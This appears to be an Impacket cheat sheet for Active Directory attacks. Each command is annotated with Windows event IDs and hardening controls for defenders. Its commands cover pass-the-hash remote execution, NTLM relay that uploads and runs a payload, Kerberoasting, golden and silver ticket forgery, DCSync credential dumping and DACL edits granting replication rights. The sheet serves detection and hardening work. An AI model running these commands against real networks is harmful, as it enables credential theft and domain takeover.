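Impacket is a Python library with tools for SMB, MSRPC, Kerberos, NTLM, WMI, and AD attacks. In the commands below, the token "[email protected]" appears to be an e-mail-obfuscation artifact from the page extraction; it stands where the original had the end of the account part followed by "@" and the target host.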
# --- Remote command execution with an existing privileged account ---
# All three tools need an account that already holds local administrator
# rights on the target. Credentials are given as arguments, so the password
# or hash ends up in shell history and in process listings on the host
# where the command is run.
#
# psexec: installs and starts a temporary Windows service on the target.
#   Defender view: System event 7045 / Security event 4697 (service
#   installed) together with a network logon (4624, type 3) from a host
#   that does not normally administer the target.
impacket-psexec domain/user:[email protected]
# -hashes takes LMHASH:NTHASH; with the LM part left empty only the NT hash
# is used, so no cleartext password is needed (pass-the-hash). It works
# wherever NTLM network logon is accepted; per-host local administrator
# passwords and restricting NTLM limit how far one hash reaches.
impacket-psexec domain/[email protected] -hashes :NTLMhash
# smbexec: also service-based, but the service's image path is a command
# line rather than an uploaded executable; 7045 entries whose path is a
# shell command are the usual indicator.
impacket-smbexec domain/user:[email protected]
# wmiexec: runs commands through WMI over DCOM; on the target the resulting
# processes are children of WmiPrvSE.exe, which is what process-creation
# telemetry should key on.
impacket-wmiexec domain/user:[email protected]
impacket-wmiexec domain/[email protected] -hashes :NTLMhash
# --- NTLM relay ---
# ntlmrelayx accepts incoming NTLM authentication and forwards it to other
# servers, acting as the authenticating account there. -tf reads the relay
# targets from a file; -smb2support enables SMB2 on the listening side.
# Relay to SMB only succeeds against hosts that do not require SMB signing,
# so enforcing signing is the primary control.
impacket-ntlmrelayx -tf targets.txt -smb2support
# -i: keeps each relayed session and exposes it as an interactive client on
# a local port instead of running the default action.
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# -e: uploads and runs the named file on each target where the relayed
# account is an administrator (service-install events as with psexec).
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
# Relay to LDAP: --escalate-user changes directory permissions in favour of
# the named account when the relayed identity is allowed to do so.
# Requiring LDAP signing and channel binding on domain controllers blocks
# this; directory-change auditing (event 5136) records the ACL edit.
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
# --- Remote execution through other Windows services ---
# atexec: runs the quoted command through the Task Scheduler service on the
# target. Defender view: Security event 4698 (scheduled task created) for a
# short-lived task, shortly after a remote logon.
impacket-atexec domain/user:[email protected] "whoami /all"
# dcomexec: runs commands by remotely activating a DCOM application object.
# Limiting inbound RPC/DCOM to management hosts and watching for shells
# spawned by DCOM host processes are the relevant controls.
impacket-dcomexec domain/user:[email protected]
# --- NTLM relay variants ---
# --remove-mic: strips the message integrity code from the relayed NTLM
# exchange; this only works against hosts missing the corresponding
# Windows security update.
impacket-ntlmrelayx -tf targets.txt -smb2support --remove-mic
# --delegate-access: over the relayed LDAPS session, sets up resource-based
# constrained delegation on the relayed computer account. Defender view:
# event 4741 (computer account created) and a change to
# msDS-AllowedToActOnBehalfOfOtherIdentity (5136).
impacket-ntlmrelayx -t ldaps://DC01 --delegate-access
# --shadow-credentials: writes a key credential to the target object's
# msDS-KeyCredentialLink attribute; audit writes to that attribute (5136).
impacket-ntlmrelayx -t ldaps://DC01 --shadow-credentials --shadow-target victim$
# --adcs: relays to the AD CS web enrollment endpoint and requests a
# certificate from the named template. Note the target is plain HTTP;
# requiring HTTPS with Extended Protection for Authentication on certsrv,
# or removing web enrollment, closes this path.
impacket-ntlmrelayx -t http://10.10.10.1/certsrv/certfnsh.asp --adcs --template DomainController
# -socks: holds relayed sessions open and offers them through a local SOCKS
# proxy so other tools can reuse them.
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
# --- Kerberos ---
# GetUserSPNs -request: asks the KDC for service tickets of user accounts
# that have an SPN, for offline password guessing (Kerberoasting).
# Defender view: bursts of event 4769 from one account, especially with RC4
# ticket encryption. Long random service-account passwords or group managed
# service accounts make the offline step impractical.
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request
# GetNPUsers: requests AS-REP data for accounts that have Kerberos
# pre-authentication disabled (AS-REP roasting); no password is needed.
# Defender view: event 4768 with pre-authentication type 0. Keeping
# pre-authentication required on every account removes the exposure.
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1
# ticketer: builds a Kerberos ticket offline from a key. With a service
# account's NT hash and -spn the result is a forged service ticket
# ("silver ticket"); no KDC request is logged for it.
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
# With the krbtgt hash the result is a forged TGT ("golden ticket").
# Recovery after krbtgt exposure requires resetting the krbtgt password
# twice.
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
# KRB5CCNAME points the tools at a credential cache file; -k -no-pass then
# authenticates with the cached ticket. The ccache file is itself a usable
# credential, and /tmp is a shared directory - keep such files in a
# private directory with restrictive permissions.
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
# getTGT: requests a TGT for the account and saves it as a ccache file.
impacket-getTGT domain.local/user:password -dc-ip 10.10.10.1
# getST -impersonate: uses the S4U extensions to obtain a service ticket in
# another user's name; this depends on delegation being configured for the
# requesting account. Marking privileged accounts as "sensitive and cannot
# be delegated" (or adding them to Protected Users) prevents their
# impersonation.
impacket-getST -spn cifs/srv.domain.local domain.local/svc_user:password -impersonate Administrator -dc-ip 10.10.10.1
# Same request made as a computer account, authenticating with its NT hash.
impacket-getST -spn cifs/target.domain.local -impersonate Administrator "domain.local/EVILPC$" -hashes :NTLMhash -dc-ip 10.10.10.1
# Forged service ticket for an MSSQL SPN; -user-id sets the RID placed in
# the ticket.
impacket-ticketer -nthash SVC_NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn MSSQLSvc/sql.domain.local -user-id 500 administrator
# raiseChild: escalates from administrator of a child domain to the forest
# root. Domains inside one forest are not a security boundary; treat a
# compromised child domain as a forest-level incident.
impacket-raiseChild child.domain.local/childadmin:password
# ticketConverter: converts between the .kirbi and .ccache ticket formats.
impacket-ticketConverter ticket.kirbi ticket.ccache
# describeTicket: prints the contents of a ticket file; also useful when
# examining ticket files recovered during an investigation.
impacket-describeTicket ticket.ccache
# --- Credential extraction ---
# secretsdump against a remote host: reads SAM hashes, LSA secrets and
# cached credentials over the network using an administrative account.
# Defender view: remote registry access and an administrative network
# logon from a host that is not a management system.
impacket-secretsdump domain/user:[email protected]
impacket-secretsdump domain/[email protected] -hashes :NTLMhash
# LOCAL: parses files that were already copied off a system (here the AD
# database plus the SYSTEM hive); nothing is sent over the network.
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
# -just-dc-ntlm / -just-dc / -just-dc-user: pull domain credential data
# from a domain controller through directory replication (DCSync).
# Defender view: event 4662 on the domain object carrying the replication
# extended rights, requested by an account or source address that is not a
# domain controller. Keep the set of principals holding replication rights
# minimal and reviewed.
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
impacket-secretsdump domain/[email protected] -just-dc
impacket-secretsdump domain/[email protected] -just-dc-user krbtgt
# -use-vss: obtains the database through a volume shadow copy on the DC
# instead of replication; shadow-copy creation on a domain controller
# outside backup windows is worth alerting on.
impacket-secretsdump domain/[email protected] -use-vss
# Offline parsing of exported SAM, SECURITY and SYSTEM registry hives.
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# dpapi masterkey: decrypts a user's DPAPI master key file with that user's
# SID and password.
impacket-dpapi masterkey -file mkfile -sid S-1-5-21-xxx -password Passw0rd
# dpapi credential: decrypts a stored credential blob with a master key that
# has already been decrypted.
impacket-dpapi credential -file cred.blob -key 0xDECRYPTED_MASTERKEY
# --- Enumeration and protocol clients ---
# Most of these need only an ordinary domain account, so the useful
# controls are limiting what authenticated users can read and baselining
# which hosts normally issue these queries.
#
# smbclient: interactive SMB client for browsing shares and files.
impacket-smbclient domain/user:[email protected]
impacket-smbclient domain/[email protected] -hashes :NTLMhash
# lookupsid: enumerates accounts by resolving SIDs over RPC.
impacket-lookupsid domain/user:[email protected]
# rpcdump: lists the RPC endpoints registered with the endpoint mapper.
impacket-rpcdump domain/user:[email protected]
# reg query: reads a registry key through the remote registry service.
impacket-reg domain/user:[email protected] query -keyName "HKLM\SAM"
# mssqlclient: SQL Server client; -windows-auth uses the Windows account
# instead of a SQL login.
impacket-mssqlclient domain/user:[email protected]
impacket-mssqlclient domain/user:[email protected] -windows-auth
# GetADUsers -all: lists user accounts from the directory.
impacket-GetADUsers -all domain.local/user:password -dc-ip 10.10.10.1
# samrdump: lists accounts through the SAM Remote protocol; restricting
# remote SAM calls to administrators limits this.
impacket-samrdump domain/user:[email protected]
# findDelegation: reports accounts configured for Kerberos delegation. The
# same report is a good audit input: unconstrained delegation and
# unexpected resource-based entries should be reviewed.
impacket-findDelegation domain.local/user:password -dc-ip 10.10.10.1
# services list: enumerates services through the Service Control Manager.
impacket-services domain/user:[email protected] list
# smbserver: serves a local directory as an SMB share named "share".
# Blocking outbound SMB at the network edge stops clients from reaching
# unmanaged SMB servers.
impacket-smbserver share /tmp/share -smb2support
# Get-GPPPassword: searches SYSVOL for passwords stored in Group Policy
# Preferences files. Remove any such files and rotate the credentials they
# contained; every domain user can read SYSVOL.
impacket-Get-GPPPassword "domain/user:[email protected]"
# --- Directory object and permission changes ---
# Each command here writes to Active Directory, so each leaves a
# directory-change record when object auditing is enabled (event 5136 for
# attribute changes, 4662 for object access).
#
# dacledit write -rights DCSync: adds the replication rights to the named
# principal on the domain object. An alert on any new holder of those
# rights is a high-value detection.
impacket-dacledit -action write -rights DCSync -principal attacker -target-dn 'DC=domain,DC=local' domain.local/admin:password
# dacledit read: shows the access control entries a principal holds on a
# target object; makes no change.
impacket-dacledit -action read -principal attacker -target victimuser domain.local/user:password
# owneredit write: changes the owner of an object; the owner can rewrite
# the object's permissions.
impacket-owneredit -action write -new-owner attacker -target victimobject domain.local/user:password
# changepasswd -reset: sets a new password on the target account using the
# rights of the account given by -altuser/-altpass. Defender view: event
# 4724 (password reset attempt) by an account outside the help desk or
# identity team.
impacket-changepasswd domain.local/[email protected] -newpass NewP@ss1 -altuser attacker -altpass Pass -reset
# addcomputer: creates a computer account as an ordinary user, which the
# default ms-DS-MachineAccountQuota permits. Setting the quota to 0 and
# delegating machine joins removes this; event 4741 records the creation.
impacket-addcomputer -computer-name 'EVILPC$' -computer-pass Passw0rd domain.local/user:password -dc-ip 10.10.10.1
# rbcd write: sets msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET$ so
# that EVILPC$ may delegate to it. Audit writes to that attribute on
# computer objects.
impacket-rbcd -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain.local/user:password -dc-ip 10.10.10.1